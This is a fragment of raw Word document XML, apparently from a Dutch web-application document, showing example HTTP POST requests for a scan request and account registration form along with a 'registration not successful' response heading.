                                <w:color w:val="008000"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="1E773E7F" w14:textId="3926902A" w:rsidR="00CE4BB5" w:rsidRPr="009B27DA" w:rsidRDefault="00CE4BB5" w:rsidP="00105199">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>naam</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>Pim&amp;email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>mail@email.nl&amp;type-scan</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>SQLi</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="2E602E8A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4B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DA2073" id="Text Box 207" o:spid="_x0000_s1077" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.35pt;margin-top:226pt;width:462pt;height:57.2pt;z-index:251888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13YkCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIWxXKKlLUgZgmIUAr&#10;E8+uY1Nrjs+zr026v35nJykV44VpL8n5vj9+dxeXbW3ZToVowJV8fDLiTDkJlXHPJf/xePPpnLOI&#10;wlXCglMl36vILxcfP1w0fq4msAFbqcDIiYvzxpd8g+jnRRHlRtUinoBXjoQaQi2QnuG5qIJoyHtt&#10;i8lodFY0ECofQKoYiXvdCfki+9daSbzXOipktuSUG+ZvyN91+haLCzF/DsJvjOzTEP+QRS2Mo6AH&#10;V9cCBdsG85er2sgAETSeSKgL0NpIlWugasajV9WsNsKrXAs1J/pDm+L/cyvvdg+Bmarkk9GMMydq&#10;GtKjapF9gZYlHnWo8XFOiitPqtiSgCY98CMxU+GtDnX6U0mM5NTr/aG/yZ0k5un52Ww6IpEk2Wxy&#10;Np3mARQv1j5E/KqgZokoeaD55baK3W1EyoRUB5UUzMGNsTbP0LrEiGBNlXj5kUCkrmxgO0HjxzYn&#10;TS6OtOjVWaoMlj5KKrgrLFO4tyo5tO670tSsXN8bEYSUyuEQJWsnLU35vMew10+mXVbvMT5Y5Mjg&#10;8GBcGwchdzNv10tjqp9DyrrTpz4f1Z1IbNdtRsl0Ogx+DdWe8BCg26no5Y2hod2KiA8i0BLRnOkw&#10;4D19tIWm5NBTnG0g/H6Ln/QJ2yTlrKGlLHn8tRVBcWa/OUL953GCDMP8mJ7OJvQIx5L1scRt6yug&#10;wY/pBHmZyaSPdiB1gPqJ7scyRSWRcJJiE1IG8gq7U0H3R6rlMivR3nqBt27lZXKd2pwg+dg+ieB7&#10;3CIh/g6G9RXzV/DtdJOlg+UWQZuM7dTorqv9AGjnM+T7+5SOyvE7a71c0cUfAAAA//8DAFBLAwQU&#10;AAYACAAAACEAy0Vf1eMAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU/CQBCF7yb+h82YeIOt&#10;UEpTOyUKITEED4AhHpfu2DZ2d5vuAuXfO570OJkv730vXwymFRfqfeMswtM4AkG2dLqxFcLHYT1K&#10;QfigrFats4RwIw+L4v4uV5l2V7ujyz5UgkOszxRCHUKXSenLmozyY9eR5d+X640KfPaV1L26crhp&#10;5SSKEmlUY7mhVh0tayq/92eD8Ha4bXbz5XtiNq+rz+1R+uN6tUV8fBhenkEEGsIfDL/6rA4FO53c&#10;2WovWoRRHM0ZRYhnEx7FRJpOpyBOCLMkiUEWufy/ofgBAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZ&#10;w8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEAV/z13YkCAACNBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAy0Vf1eMAAAALAQAADwAAAAAAAAAAAAAAAADhBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B0DABBC" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00105199">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">POST </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>aanvraag</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>scan HTTP</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                        <w:t>1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="102CB70E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00105199">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="1E773E7F" w14:textId="3926902A" w:rsidR="00CE4BB5" w:rsidRPr="009B27DA" w:rsidRDefault="00CE4BB5" w:rsidP="00105199">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>naam</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>Pim&amp;email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>mail@email.nl&amp;type-scan</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>SQLi</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="2E602E8A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00710940">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251922432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07EBD7CD" wp14:editId="5C6C8C9C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-264795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1386205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5874385" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="18415" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="510" name="Text Box 510"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5874385" cy="8026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F91C9DF" w14:textId="41A32DD7" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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66FA22E3" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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519451E" w14:textId="2434D5CE" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00380494">
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>&lt;h3&gt;</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>Registratie</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> was </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>niet</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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succesvol</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>&lt;/h3&gt;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BD7CD" id="Text Box 510" o:spid="_x0000_s1078" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.85pt;margin-top:109.15pt;width:462.55pt;height:63.2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UMmIoCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI27Wsq0hRB2KahAAN&#10;Jp5dx6bWHJ9nX5t0f/3OTlIqxgvTXpLzfX/87s7O29qynQrRgCv5+GTEmXISKuOeSv7j4erDnLOI&#10;wlXCglMl36vIz5fv3501fqEmsAFbqcDIiYuLxpd8g+gXRRHlRtUinoBXjoQaQi2QnuGpqIJoyHtt&#10;i8lodFo0ECofQKoYiXvZCfky+9daSbzVOipktuSUG+ZvyN91+hbLM7F4CsJvjOzTEP+QRS2Mo6AH&#10;V5cCBdsG85er2sgAETSeSKgL0NpIlWugasajF9Xcb4RXuRZqTvSHNsX/51be7O4CM1XJZ2PqjxM1&#10;DelBtci+QMsSjzrU+LggxXtPqtiSgCY98CMxU+GtDnX6U0mM5ORrf+hvcieJOZt/mn6czziTJJuP&#10;JqfT7L54tvYh4lcFNUtEyQPNL7dV7K4jUiakOqikYA6ujLV5htYlRgRrqsTLjwQidWED2wkaP7Y5&#10;aXJxpEWvzlJlsPRRUsFdYZnCvVXJoXXflaZm5fpeiSCkVA6HKFk7aWnK5y2GvX4y7bJ6i/HBIkcG&#10;hwfj2jgIuZt5u54bU/0cUtadPvX5qO5EYrtuM0qms2Hwa6j2hIcA3U5FL68MDe1aRLwTgZaIIECH&#10;AW/poy00JYee4mwD4fdr/KRP2CYpZw0tZcnjr60IijP7zRHqP4+nBBmG+TGdfZrQIxxL1scSt60v&#10;gAY/phPkZSaTPtqB1AHqR7ofqxSVRMJJik1IGcgL7E4F3R+pVqusRHvrBV67ey+T69TmBMmH9lEE&#10;3+MWCfE3MKyvWLyAb6ebLB2stgjaZGynRndd7QdAO58h39+ndFSO31nr+You/wAAAP//AwBQSwME&#10;FAAGAAgAAAAhAKNnzt7jAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FrwkAQhe+F/odlCr3p&#10;JiaYkGYirSIUsQe1SI9rMk1Cs7Mhu2r8992e7HF4H+99ky9G3YkLDbY1jBBOAxDEpalarhE+D+tJ&#10;CsI6xZXqDBPCjSwsiseHXGWVufKOLntXC1/CNlMIjXN9JqUtG9LKTk1P7LNvM2jl/DnUshrU1Zfr&#10;Ts6CYC61atkvNKqnZUPlz/6sEd4Pt80uWX7M9eZt9bU9Sntcr7aIz0/j6wsIR6O7w/Cn79Wh8E4n&#10;c+bKig5hEoeJRxFmYRqB8ESaRjGIE0IUxwnIIpf/fyh+AQAA//8DAFBLAQItABQABgAIAAAAIQDk&#10;mcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAG&#10;AAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAG&#10;AAgAAAAhAKrlDJiKAgAAjQUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAKNnzt7jAAAACwEAAA8AAAAAAAAAAAAAAAAA4gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0F91C9DF" w14:textId="41A32DD7" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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66FA22E3" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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519451E" w14:textId="2434D5CE" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00380494">
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>&lt;h3&gt;</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>Registratie</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> was </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>niet</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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succesvol</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>&lt;/h3&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00710940">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251924480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2254A1C9" wp14:editId="69A3FAFE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5704840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1045845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192" name="Curved Left Arrow 192"/>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543C27" id="Curved Left Arrow 192" o:spid="_x0000_s1026" type="#_x0000_t103" style="position:absolute;margin-left:449.2pt;margin-top:82.35pt;width:22pt;height:45pt;z-index:25192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iIuJ4CAADCBQAADgAAAGRycy9lMm9Eb2MueG1srFTBbtswDL0P2D8Iuq+Og3RdgzpFkKLDgKAt&#10;2g49K7IUG5BFjVLiZF8/SnactCs2YNhFFk3ykXwieXW9awzbKvQ12ILnZyPOlJVQ1nZd8O/Pt5++&#10;cOaDsKUwYFXB98rz69nHD1etm6oxVGBKhYxArJ+2ruBVCG6aZV5WqhH+DJyypNSAjQgk4jorUbSE&#10;3phsPBp9zlrA0iFI5T39vemUfJbwtVYy3GvtVWCm4JRbSCemcxXPbHYlpmsUrqpln4b4hywaUVsK&#10;OkDdiCDYBuvfoJpaInjQ4UxCk4HWtVSpBqomH72p5qkSTqVaiBzvBpr8/4OVd9sHZHVJb3c55syK&#10;hh5pscGtKtlS6cDmiNCyqCSqWuen5PHkHrCXPF1j3TuNTfxSRWyX6N0P9KpdYJJ+ji8uJyN6BEmq&#10;84v8nO6Ekh2dHfrwVUHD4qXgMqURs0hJJH7FdulD53WwjmE9mLq8rY1JQmwetTDItoKefbVOuVOc&#10;V1bG/s0x7PI+wRNHgomeWaSiKz7dwt6oiGfso9LEZyw3JZw6+ZiMkFLZkHeqSpSqy5G4GNgYPBI3&#10;CTAia6puwO4BXhd6wO7o6e2jq0qDMDiP/pRY5zx4pMhgw+Dc1BbwPQBDVfWRO/sDSR01kaUVlHvq&#10;NoRuDL2TtzW99FL48CCQ5o6ag3ZJuKdDG2gLDv2Nswrw53v/oz2NA2k5a2mOC+5/bAQqzsw3S4Ny&#10;mU8mcfCTMDm/GJOAp5rVqcZumgVQz+S0tZxM12gfzOGqEZoXWjnzGJVUwkqKTb0a8CAsQrdfaGlJ&#10;NZ8nMxp2J8LSPjkZwSOrsX2fdy8CXd/ugebkDg4zL6ZvWr2zjZ4W5psAuk5zcOS155sWRWqcfqnF&#10;TXQqJ6vj6p39AgAA//8DAFBLAwQUAAYACAAAACEAuefqdN4AAAALAQAADwAAAGRycy9kb3ducmV2&#10;LnhtbEyPwU7DMBBE70j8g7VIvVGnUQhuGqdClZBaJA4UenfjJYmI11HstuHv2Z7KcWeeZmfK9eR6&#10;ccYxdJ40LOYJCKTa244aDV+fr48KRIiGrOk9oYZfDLCu7u9KU1h/oQ8872MjOIRCYTS0MQ6FlKFu&#10;0Zkw9wMSe99+dCbyOTbSjubC4a6XaZLk0pmO+ENrBty0WP/sT07De658TtNObXFHiZebxdC9HbSe&#10;PUwvKxARp3iD4Vqfq0PFnY7+RDaIXoNaqoxRNvLsGQQTyyxl5aghfWJFVqX8v6H6AwAA//8DAFBL&#10;AQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBl&#10;c10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxz&#10;Ly5yZWxzUEsBAi0AFAAGAAgAAAAhAN/4iLieAgAAwgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9l&#10;Mm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhALnn6nTeAAAACwEAAA8AAAAAAAAAAAAAAAAA9gQAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAABBgAAAAA=&#10;" adj="16320,20280,5400" fillcolor="#e7e6e6 [3214]" strokecolor="black [3213]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00380494" w:rsidRPr="00384C9C">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251920384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F08AB96" wp14:editId="7FDDCB31">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-261620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>472440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5873115" cy="764540"/>
                <wp:effectExtent l="0" t="0" r="19685" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="508" name="Text Box 508"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5873115" cy="764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F930949" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00380494">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">POST </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>registreer</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>account HTTP</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                              <w:t>1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="76D81666" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00380494">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5AE04203" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="005761F4" w:rsidRDefault="00CE4BB5" w:rsidP="00380494">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>naam</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>Pim&amp;email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>mail@email.nl&amp;bedrijf</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>company&amp;tel</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005761F4">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
